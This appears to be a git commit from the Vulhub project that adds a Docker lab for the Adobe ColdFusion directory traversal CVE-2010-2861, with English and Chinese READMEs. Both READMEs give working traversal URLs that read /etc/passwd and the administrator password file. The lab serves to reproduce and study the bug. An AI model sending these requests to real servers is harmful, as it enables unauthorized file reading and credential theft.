first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
coldfusion/CVE-2010-2861/1.png
Normal file
BIN
coldfusion/CVE-2010-2861/1.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 43 KiB |
BIN
coldfusion/CVE-2010-2861/2.png
Normal file
BIN
coldfusion/CVE-2010-2861/2.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 33 KiB |
27
coldfusion/CVE-2010-2861/README.md
Normal file
27
coldfusion/CVE-2010-2861/README.md
Normal file
@@ -0,0 +1,27 @@
|
||||
# Adobe ColdFusion Directory Traversal Vulnerability (CVE-2010-2861)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Adobe ColdFusion is a commercial rapid web-application development computing platform created by J. J. Allaire in 1995.
|
||||
|
||||
There is a directory traversal vulnerability in the Adobe ColdFusion 9.0.1 and earlier, which allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.
|
||||
|
||||
## Environment setup
|
||||
|
||||
Execute the following command to start Adobe CouldFusion 8.0.1 server:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
The server startup may take 1~5 minutes. After that, visit `http://your-ip:8500/CFIDE/administrator/enter.cfm` to see the initialization page, enter the password `admin` to initialize the entire server.
|
||||
|
||||
## POC
|
||||
|
||||
Read the file `/etc/passwd` via `http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en`:
|
||||
|
||||
|
||||
|
||||
Read the background administrator password via `http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/ password.properties%00en`:
|
||||
|
||||
|
||||
25
coldfusion/CVE-2010-2861/README.zh-cn.md
Normal file
25
coldfusion/CVE-2010-2861/README.zh-cn.md
Normal file
@@ -0,0 +1,25 @@
|
||||
# Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
|
||||
|
||||
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
|
||||
|
||||
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
|
||||
|
||||
## 环境搭建
|
||||
|
||||
执行如下命令启动Adobe CouldFusion 8.0.1版本服务器:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
环境启动可能需要1~5分钟,启动后,访问`http://your-ip:8500/CFIDE/administrator/enter.cfm`,可以看到初始化页面,输入密码`admin`,开始初始化整个环境。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
直接访问`http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en`,即可读取文件`/etc/passwd`:
|
||||
|
||||
|
||||
|
||||
读取后台管理员密码`http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en`:
|
||||
|
||||
|
||||
6
coldfusion/CVE-2010-2861/docker-compose.yml
Normal file
6
coldfusion/CVE-2010-2861/docker-compose.yml
Normal file
@@ -0,0 +1,6 @@
|
||||
version: '2'
|
||||
services:
|
||||
coldfusion:
|
||||
image: vulhub/coldfusion:8.0.1
|
||||
ports:
|
||||
- "8500:8500"
|
||||
Reference in New Issue
Block a user